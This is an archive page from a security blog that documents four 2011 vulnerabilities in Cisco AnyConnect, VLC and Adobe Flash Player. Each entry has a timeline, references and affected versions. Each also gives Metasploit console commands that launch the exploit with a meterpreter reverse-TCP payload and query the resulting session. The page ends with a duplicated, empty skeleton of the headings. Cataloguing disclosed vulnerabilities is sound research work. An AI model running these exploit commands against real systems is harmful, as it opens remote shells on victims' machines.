Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-2039 : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

07/06/2011Exploits, MetasploitCisco, VPNwow

Timeline :

Vulnerability discovered by Elazar Broad and submitted to iDefense Labs
Initial vulnerability notification to Cisco the 2009-02-24
Public release of Cisco Security Advisory 2011-06-01
Metasploit PoC provided by bannedit the 2011-06-06

PoC provided by :

bannedit

Reference(s) :

CVE-2011-2039
OSVDB-72714
CISCO-SA-20110601-AC
iDefense Labs

Affected version(s) :

For Windows all versions prior to 2.3.185
For Linux, Apple Mac OS X all versions in major releases other than 2.5.x and 3.0.x
2.5.x releases prior to 2.5.3041
3.0.x releases prior to 3.0.629
Microsoft Windows Mobile versions are affected, but no updated are planned.

Tested on Windows XP SP3 with :

With Cisco AnyConnect VPN Client 2.0.0343

Description :

This module exploits a vulnerability in the Cisco AnyConnect VPN client vpnweb.ocx ActiveX control. This control is typically used to install the VPN client. An attacker can set the ‘url’ property which is where the control tries to locate the files needed to install the client. The control tries to download two files from the site specified within the ‘url’ property. One of these files it will be stored in a temporary directory and executed.

Commands :

use exploit/windows/browser/cisco_anyconnect_exec
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

07/05/2011Exploits, MetasploitVideoLAN, VLCwow

Timeline :

libmodplug vulnerability discovered by SEC Consult
libmodplug vendor contacted the 2011-03-25
libmodplug vendor release a new version the 2011-04-02
libmodplug vulnerability vulnérabilité publicly released the 2011-04-07
VideoLAN VLC 1.1.9 released the 2011-04-12
Metasploit PoC provided by duck the 2011-05-06

PoC provided by :

jduck

Reference(s) :

CVE-2011-1574
OSVDB-72143
VideoLAN VLC release notes

Affected version(s) :

VideoLAN VLC 1.1.8 and earlier versions for Windows, Macintosh, Linux and Solaris

Tested on Windows XP SP3 with :

VideoLAN VLC 1.1.8

Description :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.

Commands :

use exploit/windows/fileformat/vlc_modplug_s3m
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sysinfo
getuid

CVE-2011-0611 : Adobe Flash Player SWF Memory Corruption Vulnerability

16/04/2011Exploits, MetasploitAdobe, Flashwow

Timeline :

Vulnerability discovered exploited in the wild
First information about the 0day published the 2011-04-11
Security Advisory APSA11-02 posted by the vendor the 2011-04-11
First vulnerability analysis provided the 2011-04-11
Vendor update provided the 2011-04-15
Metasploit PoC provided by sinn3r the 2011-04-15

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2011-0611
APSA11-02
OSVDB-71686

Affected version(s) :

Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.25 and earlier for Chrome users
Adobe Flash Player 10.2.156.12 and earlier versions for Android
Adobe AIR 2.6.19120 and earlier versions for Windows, Macintosh and Linux

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Adobe Flash Player 10.2.153.1

Description :

This module exploits a vulnerability in Adobe Flash Player that was discovered, and has been exploited actively in the wild. By embedding a specially crafted .swf file, Adobe Flash crashes due to an invalid use of an object type, which allows attackers to overwrite a pointer in memory, and results arbitrary code execution.

Commands :

use exploit/windows/browser/adobe_flashplayer_flash10o
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sysinfo
getuid

CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

27/03/2011Exploits, MetasploitAdobe, Flashwow

Timeline :

Vulnerability discovered exploited in the wild
This vulnerability was used to attack RSA
First information about the 0day published the 2011-03-11
Security Advisory APSA11-01 posted by the vendor the 2011-03-14
First vulnerability analysis provided by villy the 2011-03-15
Metasploit PoC provided by bannedit the 2011-03-22

PoC provided by :

Unknown
bannedit

Reference(s) :

CVE-2011-0609
APSA11-01
OSVDB-71254

Affected version(s) :

Adobe Flash Player 10.2.152.33 and earlier versions for Windows, Macintosh, Linux and Solaris
Adobe Flash Player 10.2.154.18 and earlier for Chrome users
Adobe Flash Player 10.1.106.16 and earlier versions for Android
Adobe Reader and Acrobat X (10.0.1)
Earlier 10.x and 9.x versions of Reader and Acrobat for Windows and Macintosh

Tested on Windows XP SP3 with :

Internet Explorer 6.0.2900.5512
Adobe Flash Player 10.2.152.26

Description :

This module exploits a vulnerability in Adobe Flash Player. This issue is caused by a failure in the ActionScript3 AVM2 verification logic. This results in unsafe JIT(Just-In-Time) code being executed. Specifically, this issue results in uninitialized memory being referenced and later executed. Taking advantage of this issue relies on heap spraying and controlling the uninitialized memory. Currently this exploit works for IE6, IE7, and Firefox 3.6 and likely several other browsers. DEP does catch the exploit and causes it to fail. Due to the nature of the uninitialized memory its fairly difficult to get around this restriction.

Commands :

use exploit/windows/browser/adobe_flashplayer_avm
set SRVHOST 192.168.178.21
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

Long time

sysinfo
getuid

Eric Romang Blog

aka wow on ZATAZ.com

Category Archives: Exploits

CVE-2011-2039 : Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :

CVE-2011-1574 : VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :

CVE-2011-0611 : Adobe Flash Player SWF Memory Corruption Vulnerability

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :

CVE-2011-0609 : Adobe Flash Player AVM Bytecode Verification Vulnerability

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP SP3 with :

Description :

Commands :